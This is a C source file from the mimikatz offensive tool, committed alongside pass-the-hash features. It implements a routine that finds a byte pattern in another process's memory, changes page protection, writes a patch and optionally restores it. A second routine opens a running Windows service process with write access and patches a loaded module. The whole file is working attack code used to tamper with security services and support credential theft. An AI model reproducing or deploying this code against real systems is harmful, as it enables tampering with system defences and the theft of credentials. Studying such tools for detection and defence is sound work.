mimikatz/modules/kull_m_patch.c
Benjamin DELPY 5571133a4b Kerberos 'Pass-The-Hash', eKeys
MSV 'Pass-The-Hash' improvements
Better Crypto output
README update
2014-04-30 23:01:08 +02:00

121 lines
4.7 KiB
C

/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : http://creativecommons.org/licenses/by/3.0/fr/
*/
#include "kull_m_patch.h"
BOOL kull_m_patch(PKULL_M_MEMORY_SEARCH sMemory, PKULL_M_MEMORY_ADDRESS pPattern, SIZE_T szPattern, PKULL_M_MEMORY_ADDRESS pPatch, SIZE_T szPatch, LONG offsetOfPatch, PKULL_M_PATCH_CALLBACK pCallBackBeforeRestore, int argc, wchar_t * args[], NTSTATUS * pRetCallBack)
{
BOOL result = FALSE, resultBackup = !pCallBackBeforeRestore, resultProtect = TRUE;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS destination = {NULL, sMemory->kull_m_memoryRange.kull_m_memoryAdress.hMemory};
KULL_M_MEMORY_ADDRESS backup = {NULL, &hLocalMemory};
MEMORY_BASIC_INFORMATION readInfos;
NTSTATUS status;
DWORD flags, oldProtect = 0, tempProtect = 0;
if(kull_m_memory_search(pPattern, szPattern, sMemory, TRUE))
{
destination.address = (LPBYTE) sMemory->result + offsetOfPatch;
if(!resultBackup)
if(backup.address = LocalAlloc(LPTR, szPatch))
resultBackup = kull_m_memory_copy(&backup, &destination, szPatch);
if(resultBackup)
{
if(kull_m_memory_query(&destination, &readInfos))
{
flags = readInfos.Protect & ~0xff;
if((readInfos.Protect & 0x0f) && ((readInfos.Protect & 0x0f) < PAGE_READWRITE))
tempProtect = PAGE_READWRITE;
else if((readInfos.Protect & 0xf0) && ((readInfos.Protect & 0xf0) < PAGE_EXECUTE_READWRITE))
tempProtect = PAGE_EXECUTE_READWRITE;
if(tempProtect)
resultProtect = kull_m_memory_protect(&destination, szPatch, tempProtect | flags, &oldProtect);
if(resultProtect)
{
if(result = kull_m_memory_copy(&destination, pPatch, szPatch))
{
if(pCallBackBeforeRestore)
{
status = pCallBackBeforeRestore(argc, args);
if(pRetCallBack)
*pRetCallBack = status;
result = kull_m_memory_copy(&destination, &backup, szPatch);
}
}
if(oldProtect)
kull_m_memory_protect(&destination, szPatch, oldProtect, NULL);
}
}
if(backup.address)
LocalFree(backup.address);
}
}
return result;
}
PKULL_M_PATCH_GENERIC kull_m_patch_getGenericFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, DWORD BuildNumber)
{
SIZE_T i;
PKULL_M_PATCH_GENERIC current = NULL;
for(i = 0; i < cbGenerics; i++)
{
if(generics[i].MinBuildNumber <= BuildNumber)
current = &generics[i];
else break;
}
return current;
}
BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PCWSTR processOrService, PCWSTR moduleName, BOOL isService) // to do for process // to do callback ! (vault & lsadump)
{
BOOL result = FALSE;
SERVICE_STATUS_PROCESS ServiceStatusProcess;
PKULL_M_MEMORY_HANDLE hMemory;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModule;
HANDLE hProcess;
KULL_M_MEMORY_ADDRESS
aPatternMemory = {NULL, &hLocalMemory},
aPatchMemory = {NULL, &hLocalMemory};
KULL_M_MEMORY_SEARCH sMemory;
PKULL_M_PATCH_GENERIC currenReferences;
if(currenReferences = kull_m_patch_getGenericFromBuild(generics, cbGenerics, MIMIKATZ_NT_BUILD_NUMBER))
{
aPatternMemory.address = currenReferences->Search.Pattern;
aPatchMemory.address = currenReferences->Patch.Pattern;
if(kull_m_service_getUniqueForName(processOrService, &ServiceStatusProcess))
{
if(ServiceStatusProcess.dwCurrentState >= SERVICE_RUNNING)
{
if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, ServiceStatusProcess.dwProcessId))
{
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &hMemory))
{
if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, moduleName, &iModule))
{
sMemory.kull_m_memoryRange.kull_m_memoryAdress = iModule.DllBase;
sMemory.kull_m_memoryRange.size = iModule.SizeOfImage;
if(result = kull_m_patch(&sMemory, &aPatternMemory, currenReferences->Search.Length, &aPatchMemory, currenReferences->Patch.Length, currenReferences->Offsets.off0, NULL, 0, NULL, NULL))
kprintf(L"\"%s\" service patched\n", processOrService);
else
PRINT_ERROR_AUTO(L"kull_m_patch");
} else PRINT_ERROR_AUTO(L"kull_m_process_getVeryBasicModuleInformationsForName");
kull_m_memory_close(hMemory);
}
} else PRINT_ERROR_AUTO(L"OpenProcess");
} else PRINT_ERROR(L"Service is not running\n");
} else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName");
} else PRINT_ERROR(L"Incorrect version in references\n");
return result;
}